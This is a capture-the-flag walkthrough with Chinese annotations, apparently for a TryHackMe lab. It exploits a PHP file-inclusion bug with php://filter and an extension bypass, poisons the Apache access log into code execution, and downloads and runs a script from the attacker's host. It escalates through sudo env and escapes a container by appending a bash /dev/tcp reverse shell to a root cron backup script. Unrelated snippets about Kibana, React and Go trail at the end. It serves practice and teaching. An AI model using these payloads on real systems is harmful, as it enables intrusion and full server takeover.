nmap -A 10.10.221.153
http://10.10.221.153/?view=cat
http://10.10.221.153/?view=dog
http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=cat
PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K
<img src="cats/<?php echo rand(1, 10); ?>.jpg" />
<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />
/etc/passwd
http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=/etc/passwd
Sorry, only dogs or cats are allowed.
/etc/passwddog
Here you go!
但是喷一些错误http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=./dog/../dog
index.php
内容 这边只截录重点<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
ext
很重要
ext
空白绕过副档名http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../index.php
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/passwd
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/apache2/apache2.conf
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../var/log/apache2/access.log
access.log
可读
access.log
来做到 LFI 2 RCE如果在浏览器输入这个
10.10.221.153?A=<?php phpinfo(); ?</php>
在 log 上会变成这样
/?A=%3C?php%20phpinfo();%20?%3C/php%3E
所以可以用 nc
nc 10.10.221.153 80
GET /MEOW?<?php phpinfo(); ?>
nc 10.10.221.153 80
GET /MEOW?<?php system($_GET[A]); ?>
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=curl%20-o%20/tmp/s%20http://10.13.21.55:8000/s
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=bash%20/tmp/s
nc -vlk 7877
/var/www/flag.php
/var/www/flag.php
sudo -l
可以发现我们可以用 root 来 run /usr/bin/env
/usr/bin/env ls /root
ls /root
env /usr/bin/sh -p
THM{D1ff3r3nt_3nv1ronments_874112}
curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
/usr/bin/env /tmp/linpeas.sh
/.dockerenv
backup.tar
跟 backup.sh
/var/www/html
来准备下载
wget http://10.10.221.153/backup.tar
tar xf backup.tar
127.0.0.1
的 curllaunch.sh
/opt/backup
挂载到本地的/root/container/backup
/opt/backup
写资料会跑到本地端
backup.sh
tar cf /root/container/backup/backup.tar /root/container
backup.tar
就刚好是当前时间!
backup.sh
echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> backup.sh
nc -vlk 7878
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
在今天的文章中,我们准备开始建立视觉化(Visualize)元件,来展现一下kibana强大的图形化...
今天要介绍视窗设定,会分成三个部份来讲,建立视窗、设定视窗大小跟视窗的其他基本设定,那我们不多说就直...
Hook 是 React 16.8 中增加的新功能, 补足了早期 Function Componen...
在写程序的过程, 多多少少会遇到需要复杂处理的状况, Go的优点是很多使用情境已经有前人帮忙整理成套...